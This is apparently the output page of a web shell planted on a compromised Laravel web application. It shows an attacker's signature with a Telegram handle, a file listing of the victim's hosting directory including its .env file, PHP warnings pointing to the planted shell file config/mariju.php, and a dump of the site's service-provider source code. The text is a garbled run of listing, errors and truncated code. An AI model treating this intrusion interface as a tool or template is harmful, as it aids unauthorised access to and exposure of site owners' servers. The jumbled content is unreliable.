telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log12870797 KBJuly 18 2025 14:03:060644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
has('lang')) { \App::setLocale(request()->get('lang')); } //In Laravel 5.6, Blade will double encode special characters by default. If you would like to maintain the previous behavior of preventing double encoding, you may add Blade::withoutDoubleEncoding() to your AppServiceProvider boot method. Blade::withoutDoubleEncoding(); //Laravel 5.6 uses Bootstrap 4 by default. Shift did not update your front-end resources or dependencies as this could impact your UI. If you are using Bootstrap and wish to continue using Bootstrap 3, you should add Paginator::useBootstrapThree() to your AppServiceProvider boot method. Paginator::useBootstrapThree(); \Illuminate\Pagination\Paginator::useBootstrap(); // Dropbox service provider Storage::extend('dropbox', function ($app, $config) { $adapter = new DropboxAdapter(new DropboxClient( $config['authorization_token'] )); return new FilesystemAdapter( new Filesystem($adapter, $config), $adapter, $config ); }); $asset_v = config('constants.asset_version', 1); View::share('asset_v', $asset_v); // Share the list of modules enabled in sidebar View::composer( ['*'], function ($view) { $enabled_modules = ! empty(session('business.enabled_modules')) ? session('business.enabled_modules') : []; $__is_pusher_enabled = isPusherEnabled(); if (! Auth::check()) { $__is_pusher_enabled = false; } $view->with('enabled_modules', $enabled_modules); $view->with('__is_pusher_enabled', $__is_pusher_enabled); } ); View::composer( ['layouts.*'], function ($view) { if (isAppInstalled()) { $keys = ['additional_js', 'additional_css']; $__system_settings = System::getProperties($keys, true); //Get js,css from modules $moduleUtil = new ModuleUtil; $module_additional_script = $moduleUtil->getModuleData('get_additional_script'); $additional_views = []; $additional_html = ''; foreach ($module_additional_script as $key => $value) { if (! empty($value['additional_js'])) { if (isset($__system_settings['additional_js'])) { $__system_settings['additional_js'] .= $value['additional_js']; } else { $__system_settings['additional_js'] = $value['additional_js']; } } if (! empty($value['additional_css'])) { if (isset($__system_settings['additional_css'])) { $__system_settings['additional_css'] .= $value['additional_css']; } else { $__system_settings['additional_css'] = $value['additional_css']; } } if (! empty($value['additional_html'])) { $additional_html .= $value['additional_html']; } if (! empty($value['additional_views'])) { $additional_views = array_merge($additional_views, $value['additional_views']); } } $view->with('__additional_views', $additional_views); $view->with('__additional_html', $additional_html); $view->with('__system_settings', $__system_settings); } } ); //This will fix "Specified key was too long; max key length is 767 bytes issue during migration" Schema::defaultStringLength(191); //Blade directive to format number into required format. Blade::directive('num_format', function ($expression) { return "number_format($expression, session('business.currency_precision', 2), session('currency')['decimal_separator'], session('currency')['thousand_separator'])"; }); //Blade directive to format quantity values into required format. Blade::directive('format_quantity', function ($expression) { return "number_format($expression, session('business.quantity_precision', 2), session('currency')['decimal_separator'], session('currency')['thousand_separator'])"; }); //Blade directive to return appropiate class according to transaction status Blade::directive('transaction_status', function ($status) { return ""; }); //Blade directive to return appropiate class according to transaction status Blade::directive('payment_status', function ($status) { return ""; }); //Blade directive to display help text. Blade::directive('show_tooltip', function ($message) { return "'; } ?>"; }); //Blade directive to convert. Blade::directive('format_date', function ($date) { if (! empty($date)) { return "\Carbon::createFromTimestamp(strtotime($date))->format(session('business.date_format'))"; } else { return null; } }); //Blade directive to convert. Blade::directive('format_time', function ($date) { if (! empty($date)) { $time_format = 'h:i A'; if (session('business.time_format') == 24) { $time_format = 'H:i'; } return "\Carbon::createFromTimestamp(strtotime($date))->format('$time_format')"; } else { return null; } }); Blade::directive('format_datetime', function ($date) { if (! empty($date)) { $time_format = 'h:i A'; if (session('business.time_format') == 24) { $time_format = 'H:i'; } return "\Carbon::createFromTimestamp(strtotime($date))->format(session('business.date_format') . ' ' . '$time_format')"; } else { return null; } }); //Blade directive to format currency. Blade::directive('format_currency', function ($number) { return ''; }); $this->registerCommands(); } /** * Register commands. * * @return void */ protected function registerCommands() { $this->commands([ InstallCommand::class, ClientCommand::class, KeysCommand::class, ]); } }